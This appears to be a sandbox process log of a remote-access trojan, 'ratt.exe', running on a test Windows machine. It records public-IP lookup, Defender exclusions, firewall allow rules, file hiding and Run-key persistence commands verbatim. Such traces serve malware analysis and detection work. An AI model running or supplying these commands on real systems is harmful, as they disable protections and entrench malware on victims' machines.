nslookup.exe nslookup myip.opendns.com. resolver1.opendns.com
2804
WMIC.exe wmic ComputerSystem get Domain
2908
powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ratt.exe"'
3032
powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\"'
908
powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"'
1336
powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"'
2272
powershell.exe Powershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\test22\AppData\Local\Temp\ratt.exe"'
2548
7z.exe 7z.exe x -o"C:\Users\test22\AppData\Local\Temp" -y ratt.7z
2644
netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
2960
netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
1152
WMIC.exe wmic computersystem where name="TEST22-PC" set AutomaticManagedPagefile=False
2216
WMIC.exe wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000
2572
ratt.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
2616
attrib.exe "C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
544
reg.exe REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F
1096
ratt.exe "ratt.exe"
2756